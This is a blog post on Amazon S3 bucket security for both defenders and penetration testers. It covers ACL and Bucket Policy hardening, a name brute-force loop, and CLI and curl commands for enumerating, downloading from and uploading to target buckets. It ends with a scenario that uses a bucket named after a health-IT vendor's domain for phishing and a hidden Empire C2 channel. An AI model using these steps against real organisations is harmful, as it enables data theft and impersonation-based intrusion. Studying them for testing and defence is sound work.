S3 Buckets for Good and Evil

Amazon’s S3 buckets have been a hot topic lately and are worth a look from both a red and a blue perspective. Just last week, poor S3 bucket access control management led to Verizon exposing approximately 14 million customer records, including customer service PINs. Just before that, a GOP analytics firm exposed 198 million voter records the same way. This isn’t a case of default settings being overlooked; S3 bucket access is restricted exclusively to the owner by default. Botching access to an internal share folder is one thing (and it happens often), but botching what amounts to a “cloud” share folder is another.

Defending Your Buckets

There are two ways to lock down your S3 buckets: the user-friendly Access Control List (ACL) and the less user-friendly Bucket Policy. The ACL (Figure 1) will be familiar to anyone who has looked at a Windows NTFS ACL. It lets you specify access controls for specific AWS users, any authenticated AWS user, and everyone (i.e., any user on the internet). By default, only the owner has read/write for both object access and permissions access, where objects are the files stored in the bucket and permissions are the ACLs themselves. With permissions access you can read/write the bucket’s ACL! This is a good place to start any S3 bucket audit.

Figure 1: Bucket Access Control List
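
If you would rather audit from the command line than the console, the same information is available through the AWS CLI. A minimal sketch (the bucket name is a placeholder); grants to the AllUsers or AuthenticatedUsers groups in the output are the red flags to look for:

 # Dump the bucket's ACL and look for group grants
 aws s3api get-bucket-acl --bucket my-example-bucket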

The Bucket Policy is much more involved, but provides much more granularity through a JSON-based access policy language. Figure 2 is an example of what this looks like. The Bucket Policy lets you attach permissions and conditions to specific resources and principals. As an example of the granularity a Bucket Policy offers over the ACLs: ACL write access grants create, overwrite, and delete permissions as a package, while a Bucket Policy lets you assign those rights individually using PutObject and DeleteObject.

Figure 2: Example Bucket Policy that allows access only from 54.240.143.0/24 and excludes 54.240.143.188 (taken from Amazon S3 documentation)
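
The original screenshot is gone, but the caption describes the well-known example from the Amazon S3 documentation; reconstructed from that source, the policy looks roughly like this (examplebucket is the documentation’s placeholder bucket name):

 {
   "Version": "2012-10-17",
   "Id": "S3PolicyId1",
   "Statement": [
     {
       "Sid": "IPAllow",
       "Effect": "Allow",
       "Principal": "*",
       "Action": "s3:*",
       "Resource": "arn:aws:s3:::examplebucket/*",
       "Condition": {
         "IpAddress": {"aws:SourceIp": "54.240.143.0/24"},
         "NotIpAddress": {"aws:SourceIp": "54.240.143.188/32"}
       }
     }
   ]
 }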

I recommend:

Ignoring the ACL and using the Bucket Policy for any access you grant. The main reason for this is granularity. For example, if you want to give everyone read access to your objects, the ACL also gives them the ability to list all objects in your bucket. With the Bucket Policy, you can give everyone only GetObject permissions, so they must have the exact URL to access objects.

Exercising the Principle of Least Access. Provide access to objects ONLY as required by your business needs. Does everyone need to access this data? Does it make sense to limit access to corporate IP addresses? Who specifically needs the ability to list objects in your bucket outside of the AWS console?

Testing your access controls. Spot-checking changes you have made to bucket permissions is the right thing to do. Double-check your changes to make sure you haven’t opened up access to Everyone by accident. Test access as an anonymous user and as an authenticated AWS user outside your organization. Review your Bucket Policies. Curl a sample of bucket objects periodically to make sure things are in order.
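
Those spot checks do not require anything fancy. A quick sketch of anonymous testing against a hypothetical bucket:

 # Anonymous list attempt; --no-sign-request sends no AWS credentials
 aws s3api list-objects --bucket my-example-bucket --no-sign-request

 # Anonymous object fetch; anything other than AccessDenied on an
 # object that should be private is a problem
 curl -i https://my-example-bucket.s3.amazonaws.com/some-object.txt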

Resources:
Permissions
Conditions
Example Policies

Bucket Reconnaissance

AWS provides a command line tool for managing S3 buckets. It can be used to list, copy, move, and delete files, and it also lets you view object ACLs and bucket policies/ACLs. Under the hood, the tool makes basic API calls that we can reproduce from other tooling: Empire agents, Cobalt Strike Beacons, Meterpreter sessions, etc.
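
For reference, the day-to-day operations look something like this (bucket and file names are hypothetical):

 aws s3 ls s3://target-bucket                        # list objects
 aws s3 cp s3://target-bucket/file.txt .             # download
 aws s3 cp local.txt s3://target-bucket/             # upload
 aws s3 rm s3://target-bucket/file.txt               # delete
 aws s3api get-bucket-acl --bucket target-bucket     # view bucket ACL
 aws s3api get-bucket-policy --bucket target-bucket  # view bucket policy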

Most buckets are used to simply host files that a web server will point a client to for downloads; however, sometimes data is placed where it shouldn’t be. And as you saw in the last section, sometimes ACLs and Bucket Policies get no more than a passing glance. S3 buckets can hold data that is useful for penetration testing purposes. Let’s take a look at how you can find and evaluate buckets.

Bucket enumeration is done through OSINT or by brute-forcing bucket names. For OSINT, it is all about finding links to S3 buckets in web applications, GitHub, StackOverflow, etc. Rapid7 did a post on their research surrounding S3 buckets several years ago; they used a combination of bucket names observed through OSINT and brute-forced lists of top companies and websites.
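
A minimal brute-force sketch along those lines, assuming you have a wordlist of candidate names (names.txt is hypothetical): S3 answers 404 NoSuchBucket for unclaimed names, so any other response code means the bucket exists.

 # Flag candidate bucket names that exist (403 = exists but denied,
 # 200 = listable, 301 = exists in another region)
 while read name; do
   code=$(curl -s -o /dev/null -w "%{http_code}" "http://${name}.s3.amazonaws.com/")
   [ "$code" != "404" ] && echo "${name} exists (HTTP ${code})"
 done < names.txt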

Once a target bucket is identified, there is a series of API calls you can use to enumerate information about the bucket and its objects. Below are useful AWS CLI commands along with the corresponding web requests/responses. Keep in mind that ACLs and Bucket Policies differentiate between anonymous access and authenticated AWS accounts (ANY AWS account).

List Objects

This is a good way to determine whether a bucket exists, and it will return a list of objects in that bucket if you have permission to list them.
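
Roughly, with the CLI or with a plain unauthenticated web request (target-bucket is a hypothetical name):

 # Via the AWS CLI, authenticated as whatever profile you have configured
 aws s3api list-objects --bucket target-bucket

 # Via raw HTTP, anonymously
 curl -i https://target-bucket.s3.amazonaws.com/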

Success: an HTTP 200 response containing an XML listing of the bucket’s keys (the CLI renders the same data as JSON).

Fail: an HTTP 403 AccessDenied if the bucket exists but you lack list permission, or a 404 NoSuchBucket if it does not exist.

GET/PUT Objects

Basic commands/calls to download and upload files from/to the bucket.
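
Something like the following, with hypothetical bucket and key names:

 # GET: download an object (CLI, then the raw HTTP equivalent)
 aws s3api get-object --bucket target-bucket --key secrets.txt secrets.txt
 curl -O https://target-bucket.s3.amazonaws.com/secrets.txt

 # PUT: upload an object
 aws s3api put-object --bucket target-bucket --key payload.txt --body payload.txt
 curl -X PUT --data-binary @payload.txt https://target-bucket.s3.amazonaws.com/payload.txt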


Get Bucket Permissions

These are used to get the Bucket ACL and Bucket Policy (get-bucket-acl and get-bucket-policy). This can be useful in a couple of ways: it shows what permissions you have, what permissions others have, and usernames you could target with social engineering to escalate access. Maybe the bucket owner has some juicy data in their GitHub account.
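
In CLI and raw HTTP form (bucket name hypothetical), where the web request queries the ?acl subresource:

 # Bucket ACL: shows the owner and any grants
 aws s3api get-bucket-acl --bucket target-bucket

 # Bucket Policy: returns the policy JSON, if one is attached
 aws s3api get-bucket-policy --bucket target-bucket

 # Raw HTTP equivalent for the ACL
 curl -i "https://target-bucket.s3.amazonaws.com/?acl"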


NOTE: Append ‘?policy’ to the path to query the Bucket Policy


Get Object Permissions

Like before, but for specific objects. Maybe you don’t have permissions for the bucket, but you do have permissions to a specific folder inside the bucket.
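
Same idea, one level down (bucket and key names hypothetical):

 # Object ACL via the CLI
 aws s3api get-object-acl --bucket target-bucket --key backups/dump.sql

 # Raw HTTP equivalent: the ?acl subresource on the object's path
 curl -i "https://target-bucket.s3.amazonaws.com/backups/dump.sql?acl"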


Attacking with Buckets

There are some interesting attacker-minded use cases I have been playing with in my head, based on some of S3’s bucket features. What caught my eye was bucket names and how they appear in the request URL. Below is an example of how a request is made to a powershell.txt file stored at the root of a given bucket:

 http://[bucketname].s3.amazonaws.com/powershell.txt

For this section, let’s say you have been hired to perform a penetration test on a medical provider. With this bucket-name-and-URL scheme, there is no name validation happening other than a check that the bucket name is not already taken. I will pick a bucket name that makes it appear to be a health information technology solution. A quick search will give you a good list of health information technology vendors to pick from; I am going to use Cerner in this hypothetical scenario. I register “cerner.com”, Cerner’s domain, as my bucket name. All requests to this bucket are made to

 http://cerner.com.s3.amazonaws.com

Figure 3: Creating a new bucket

I found this to be very interesting for social engineering purposes. You get around categorization issues and have an inherently trustworthy platform from which to deliver your payload, exfiltrate data, or run a C2 channel. At this point we have notionally set up a phishing campaign that plays on Cerner and involves a link to an OLE-embedded Office document in our S3 bucket.

Taking this a step further, I think it would be fun to imagine what it might look like to use this bucket as a C2 channel for Empire. We have the ability to granularly allow anonymous reading and writing to the bucket root or any subfolders we like. In order to protect our attack infrastructure, our Bucket Policy might look something like this:

Figure 4: Policies for agents

Figure 5: Policies for Empire server
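
The original policy screenshots are gone, but a sketch of what the agent-side statement (Figure 4’s role) might look like follows. The folder name, source range (203.0.113.0/24), and user agent string are all hypothetical, and note that aws:UserAgent is trivially spoofable, which is exactly why it works as a cheap shared secret here. The Empire server side (Figure 5’s role) would be the same idea scoped to the server’s IP, with list permissions added.

 {
   "Version": "2012-10-17",
   "Statement": [
     {
       "Sid": "AgentTasking",
       "Effect": "Allow",
       "Principal": "*",
       "Action": ["s3:GetObject", "s3:PutObject"],
       "Resource": "arn:aws:s3:::cerner.com/c2/*",
       "Condition": {
         "IpAddress": {"aws:SourceIp": "203.0.113.0/24"},
         "StringEquals": {"aws:UserAgent": "Mozilla/5.0 (AgentToken1234)"}
       }
     }
   ]
 }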


With these policies in place, no one outside of the specified IP addresses has any permissions to our bucket. Agents in the target organization can contact the appropriate bucket subfolders to PUT and GET C2 communications, but cannot list objects, and any request without the specified user agent gets nothing. PUT and GET here are plain HTTP PUT and GET requests to the specified folders; no AWS tools needed. AWS also lets you do cool l33t hacker things in this scenario, like getting a text message when an agent stages, using SNS topics (Figure 6). I am no longer in the traveling pentester consultant game, so I have no need to build something like this out, but it would be cool to see if anyone does.

Figure 6: Get a text when someone executes your payload

Conclusion

S3 buckets can be a lucrative place to focus some time on if you discover the organization you are pentesting is using them. They can also be a useful tool in all phases of a penetration test or red team engagement, depending on how they fit your team’s needs. As far as toolsets go, the AWS CLI tool is a good place to start. It is built with boto, an AWS SDK for Python, and an offensive toolset named aws_pwn was also created with boto. For defenders, S3 buckets should be treated as what they are: public-facing share folders. Audit them periodically, and review Bucket Policies and ACL settings prior to any new bucket implementation.
